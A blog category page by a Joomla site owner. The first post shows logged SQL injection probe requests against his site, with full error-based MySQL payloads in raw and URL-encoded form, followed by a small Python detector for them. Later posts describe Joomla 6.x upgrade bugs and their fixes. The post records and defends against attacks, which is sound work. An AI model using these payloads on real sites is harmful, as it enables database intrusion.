helio.loureiro.eng.br
Attacks on Joomla

Written by: Helio Loureiro
Category: Joomla
Published: April 27, 2026
  • security

I have been receiving a lot of attacks. And today I noticed that one of them managed to get into the site's cache.


{
  "time": "2026-04-27T02:26:01.602Z",
  "process": "338026",
  "filename": "/loureiro/index.php",
  "remoteIP": "104.209.8.138",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120'%20AND%20,(/*!50000SELECT*/9786/*!50000FROM*/(/*!50000SELECT*//*!50000COUNT*/(*),/*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9786=9786,1))),'~',FLOOR(RAND(0)*2))x/*!50000FROM*/INFORMATION_SCHEMA.PLUGINS/*!50000GROUP*//*!50000BY*/x)a)--%20-&start=481&task=view",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36",
  "referer": "-"
}
{
  "time": "2026-04-27T03:06:29.334Z",
  "process": "547775",
  "filename": "/loureiro/index.php",
  "remoteIP": "198.244.240.225",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120\"))/*!50000AND*/EXP(~(/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9611=9611,1))),'~','x'))x))%20AND%20((\"NsNw9DLC\"=\"NsNw9DLC\"&task=view",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}
{
  "time": "2026-04-27T04:13:48.938Z",
  "process": "1719898",
  "filename": "/loureiro/index.php",
  "remoteIP": "5.39.109.174",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120'%20AND%20,(/*!50000SELECT*/9786/*!50000FROM*/(/*!50000SELECT*//*!50000COUNT*/(*),/*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9786=9786,1))),'~',FLOOR(RAND(0)*2))x/*!50000FROM*/INFORMATION_SCHEMA.PLUGINS/*!50000GROUP*//*!50000BY*/x)a)--%20-&task=view&start=26",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}
{
  "time": "2026-04-27T04:38:04.280Z",
  "process": "1364863",
  "filename": "/loureiro/index.php",
  "remoteIP": "170.79.185.158",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120%22%29%29%2F%2A%2150000AND%2A%2FEXP%28~%28%2F%2A%2150000SELECT%2A%2F%2A%2F%2A%2150000FROM%2A%2F%28%2F%2A%2150000SELECT%2A%2F%2F%2A%2150000CONCAT%2A%2F%28%27~%27%2C%28%2F%2A%2150000SELECT%2A%2F%28ELT%289611%3D9611%2C1%29%29%29%2C%27~%27%2C%27x%27%29%29x%29%29+AND+%28%28%22NsNw9DLC%22%3D%22NsNw9DLC%22&start=169&task=view",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36",
  "referer": "https://helio.loureiro.eng.br/index.php?id=120%22%29%29%2F%2A%2150000AND%2A%2FEXP%28~%28%2F%2A%2150000SELECT%2A%2F%2A%2F%2A%2150000FROM%2A%2F%28%2F%2A%2150000SELECT%2A%2F%2F%2A%2150000CONCAT%2A%2F%28%27~%27%2C%28%2F%2A%2150000SELECT%2A%2F%28ELT%289611%3D9611%2C1%29%29%29%2C%27~%27%2C%27x%27%29%29x%29%29+AND+%28%28%22NsNw9DLC%22%3D%22NsNw9DLC%22&start=143&task=view"
}
{
  "time": "2026-04-27T04:38:20.526Z",
  "process": "33454",
  "filename": "/loureiro/index.php",
  "remoteIP": "217.199.226.8",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120%22%29%29%2F%2A%2150000AND%2A%2FEXP%28~%28%2F%2A%2150000SELECT%2A%2F%2A%2F%2A%2150000FROM%2A%2F%28%2F%2A%2150000SELECT%2A%2F%2F%2A%2150000CONCAT%2A%2F%28%27~%27%2C%28%2F%2A%2150000SELECT%2A%2F%28ELT%289611%3D9611%2C1%29%29%29%2C%27~%27%2C%27x%27%29%29x%29%29+AND+%28%28%22NsNw9DLC%22%3D%22NsNw9DLC%22&start=169&task=view",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36",
  "referer": "https://helio.loureiro.eng.br/index.php?id=120%22%29%29%2F%2A%2150000AND%2A%2FEXP%28~%28%2F%2A%2150000SELECT%2A%2F%2A%2F%2A%2150000FROM%2A%2F%28%2F%2A%2150000SELECT%2A%2F%2F%2A%2150000CONCAT%2A%2F%28%27~%27%2C%28%2F%2A%2150000SELECT%2A%2F%28ELT%289611%3D9611%2C1%29%29%29%2C%27~%27%2C%27x%27%29%29x%29%29+AND+%28%28%22NsNw9DLC%22%3D%22NsNw9DLC%22&start=143&task=view"
}
{
  "time": "2026-04-27T05:08:21.162Z",
  "process": "459943",
  "filename": "/loureiro/index.php",
  "remoteIP": "51.195.183.127",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120\"))/*!50000AND*/EXP(~(/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9611=9611,1))),'~','x'))x))%20AND%20((\"NsNw9DLC\"=\"NsNw9DLC\"&task=view&start=52",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}
{
  "time": "2026-04-27T05:12:55.699Z",
  "process": "243586",
  "filename": "/loureiro/index.php",
  "remoteIP": "51.89.129.94",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120\"))/*!50000AND*/EXP(~(/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9611=9611,1))),'~','x'))x))%20AND%20((\"NsNw9DLC\"=\"NsNw9DLC\"&task=view&start=377",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}
{
  "time": "2026-04-27T05:25:00.517Z",
  "process": "406363",
  "filename": "/loureiro/index.php",
  "remoteIP": "198.244.226.168",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120\"))/*!50000AND*/EXP(~(/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9611=9611,1))),'~','x'))x))%20AND%20((\"NsNw9DLC\"=\"NsNw9DLC\"&task=view&start=364",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}
{
  "time": "2026-04-27T07:18:24.576Z",
  "process": "287085",
  "filename": "/loureiro/index.php",
  "remoteIP": "198.244.183.180",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120'%20AND%20,(/*!50000SELECT*/9786/*!50000FROM*/(/*!50000SELECT*//*!50000COUNT*/(*),/*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9786=9786,1))),'~',FLOOR(RAND(0)*2))x/*!50000FROM*/INFORMATION_SCHEMA.PLUGINS/*!50000GROUP*//*!50000BY*/x)a)--%20-&task=view&start=117",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}
{
  "time": "2026-04-27T07:40:43.198Z",
  "process": "155356",
  "filename": "/loureiro/index.php",
  "remoteIP": "54.38.147.143",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php/component/finder/search",
  "query": "?q=1/*!50000AND*/(/*!50000SELECT*/2*(IF((/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(4119=4119,1))),'~','x'))s),/**/8446744073709551610,/**/8446744073709551610)))%20PROCEDURE%20ANALYSE(6670,1)--%20-&Itemid=101",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}
{
  "time": "2026-04-27T07:58:26.393Z",
  "process": "530181",
  "filename": "/loureiro/index.php",
  "remoteIP": "54.38.147.108",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120'))/*!50000AND*/(/*!50000SELECT*/2*(IF((/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(7089=7089,1))),'~','x'))s),/**/8446744073709551610,/**/8446744073709551610)))%20AND%20(('q3G8xIn9'%20LIKE%20'q3G8xIn9&task=view",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}

I reduced the cache time to see if that keeps things under control. But I will probably need to configure my fail2ban for these regexes.
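An added example, not code from the original post: a small detector for the two request styles in the log above (raw and percent-encoded), which is the matching a ban rule for these requests has to get right. The function names are hypothetical, the one-JSON-object-per-line input is an assumption, and the sample records are constructed with documentation IP addresses.

```python
import json
import re
from urllib.parse import unquote_plus

# MySQL versioned comment wrapping a keyword, e.g. /*!50000SELECT*/.
VERSIONED_COMMENT = re.compile(r"/\*!\d{5}\s*[A-Za-z_]+\s*\*/")
# Other constructs that appear in the logged queries above.
SQL_MARKERS = re.compile(
    r"INFORMATION_SCHEMA|PROCEDURE\s+ANALYSE|\bEXP\s*\(\s*~"
    r"|FLOOR\s*\(\s*RAND\s*\(|\bELT\s*\(",
    re.IGNORECASE,
)

def decode(query, rounds=2):
    """Percent-decode up to `rounds` times so raw and encoded forms match alike."""
    for _ in range(rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query

def is_sqli_probe(query):
    q = decode(query)
    return bool(VERSIONED_COMMENT.search(q) or SQL_MARKERS.search(q))

def offenders(log_lines):
    """Map remoteIP -> number of matching requests (one JSON object per line)."""
    hits = {}
    for line in log_lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines
        if is_sqli_probe(rec.get("query", "")):
            ip = rec.get("remoteIP", "?")
            hits[ip] = hits.get(ip, 0) + 1
    return hits

# Constructed sample: shortened queries in the style of the log, documentation IPs.
SAMPLE = [json.dumps(r) for r in (
    {"remoteIP": "192.0.2.10", "query": "?id=120'%20AND%20(/*!50000SELECT*/1/*!50000FROM*/INFORMATION_SCHEMA.PLUGINS)--%20-&task=view"},
    {"remoteIP": "192.0.2.10", "query": "?id=120%22%29%29%2F%2A%2150000AND%2A%2FEXP%28~%28%2F%2A%2150000SELECT%2A%2F1%29%29&task=view"},
    {"remoteIP": "198.51.100.7", "query": "?id=120&task=view&start=26"},
    {"remoteIP": "203.0.113.5", "query": "?q=fail2ban+select+from+logs&Itemid=101"},
)]

if __name__ == "__main__":
    print(offenders(SAMPLE))
```

fail2ban matches the line exactly as it was logged, so a `failregex` written only for the literal `/*!50000` form would miss the percent-encoded requests (`%2F%2A%2150000`); the pattern has to cover both spellings.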

Joomla 6.1 still has some hiccups

Written by: Helio Loureiro
Category: Joomla
Published: April 19, 2026
  • bug

Tinkering here and there, a few bugs still show up in my Joomla 6.1. The latest one is in the image below:

"Failed opening required '/var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/adapther.php' (include_path=´.:/usr/share/php')"

I found a reference at this link:

https://www.blog.nestict.com/fixing-joomla-error-failed-opening-required-com_finder-helpers-indexer-adapter-php-the-real-cause-and-solution/

Although it discusses the same error, it is still not the same problem. I do not have that plugin.

What I did for now was search for where this file is referenced:


$ rg "com_finder/helpers/indexer/adapter.php" /var/www/loureiro.eng.br
/var/www/loureiro.eng.br/plugins/finder/weblinks/weblinks.php
15:require_once JPATH_ADMINISTRATOR . '/components/com_finder/helpers/indexer/adapter.php';

/var/www/loureiro.eng.br/administrator/components/com_akeebabackup/backup/akeeba.backend.id-20251212-144959-340716.log.php
24599:DEBUG   |20251212 14:50:16|-- Adding administrator/components/com_finder/helpers/indexer/adapter.php to archive (source: /var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/adapter.php)

/var/www/loureiro.eng.br/administrator/components/com_akeebabackup/backup/akeeba.backend.id-20251228-175859-132763.log.php
24601:DEBUG   |20251228 17:59:17|-- Adding administrator/components/com_finder/helpers/indexer/adapter.php to archive (source: /var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/adapter.php)

/var/www/loureiro.eng.br/administrator/components/com_admin/script.php
502:            //'/administrator/components/com_finder/helpers/indexer/adapter.php',

I found a reference to adapter.php under the admin components:


$ fd adapter.php /var/www/loureiro.eng.br | grep administrator | grep components | grep com_finder
/var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/adapter.php
/var/www/loureiro.eng.br/administrator/components/com_finder/src/Indexer/Adapter.php
/var/www/loureiro.eng.br/administrator/components/com_finder/src/Indexer/DebugAdapter.php

I created the first item manually to try to suppress the error. There is nothing inside it. And it did not work.

So I used the second reference. I commented out the line and pointed it to where an Adapter.php exists:


$ rg -A 1 "com_finder/helpers/indexer/adapter.php" /var/www/loureiro.eng.br
/var/www/loureiro.eng.br/plugins/finder/weblinks/weblinks.php
15://require_once JPATH_ADMINISTRATOR . '/components/com_finder/helpers/indexer/adapter.php';
16-require_once JPATH_ADMINISTRATOR . '/components/com_finder/src/Indexer/Adapter.php';

/var/www/loureiro.eng.br/administrator/components/com_akeebabackup/backup/akeeba.backend.id-20251212-144959-340716.log.php
24599:DEBUG   |20251212 14:50:16|-- Adding administrator/components/com_finder/helpers/indexer/adapter.php to archive (source: /var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/adapter.php)
24600-DEBUG   |20251212 14:50:16|-- Adding administrator/components/com_finder/helpers/indexer/helper.php to archive (source: /var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/helper.php)

/var/www/loureiro.eng.br/administrator/components/com_akeebabackup/backup/akeeba.backend.id-20251228-175859-132763.log.php
24601:DEBUG   |20251228 17:59:17|-- Adding administrator/components/com_finder/helpers/indexer/adapter.php to archive (source: /var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/adapter.php)
24602-DEBUG   |20251228 17:59:17|-- Adding administrator/components/com_finder/helpers/indexer/helper.php to archive (source: /var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/helper.php)

/var/www/loureiro.eng.br/administrator/components/com_admin/script.php
502:            //'/administrator/components/com_finder/helpers/indexer/adapter.php',
503-        '/administrator/components/com_finder/src/Indexer/Adapter.php',


The error went away.

For now...

Update: yeah... it did not work. When trying to index through the quick search... kaboom!

And Joomla 6.0.3 is installed

Written by: Helio Loureiro
Category: Joomla
Published: February 27, 2026
  • curl
  • bug
  • php
  • apache

joomla broken 2 2026 02 23 16 29

After the error upgrading to Joomla 6.0.3 described in "And things went wrong with Joomla 6.0.2", I more or less let it go, waiting for something like 6.0.4 to come out that might fix it. But today I decided to open a bug report.

I put the site in debug mode and ran the upgrade. I grabbed the error and went to the site to file the bug.

The first task was to check whether a bug was already open. And I found one:

https://issues.joomla.org/tracker/joomla-cms/31330

The bug mentions that curl support is missing.

So I connected to the server and installed php8.4-curl. I ran the upgrade and... it failed.

Of course! PHP requires restarting the web server, which is Apache.

I restarted it and... bingo! We are on version 6.0.3.

And things went wrong with Joomla 6.0.2

Written by: Helio Loureiro
Category: Joomla
Published: February 23, 2026
  • bug

Something broke. And it no longer upgrades.

joomla broken 2026 02 23 16 28

It shows up correctly on the administration dashboard screen. But when it comes to doing the upgrade itself...

joomla broken 2 2026 02 23 16 29

There is not much I can do, so I will wait for the next version.

And on to Joomla 6.0.2

Written by: Helio Loureiro
Category: Joomla
Published: January 12, 2026
  • upgrade

joomla 6.0.2 2026 01 12 16 21

If it is out, then we have to update.

Of course I did not use the full package. I did it with the upgrade one.

By the way: I found some files that did not go through successfully during the upgrade. I went to look and the owner was set to... root. They have been fixed.
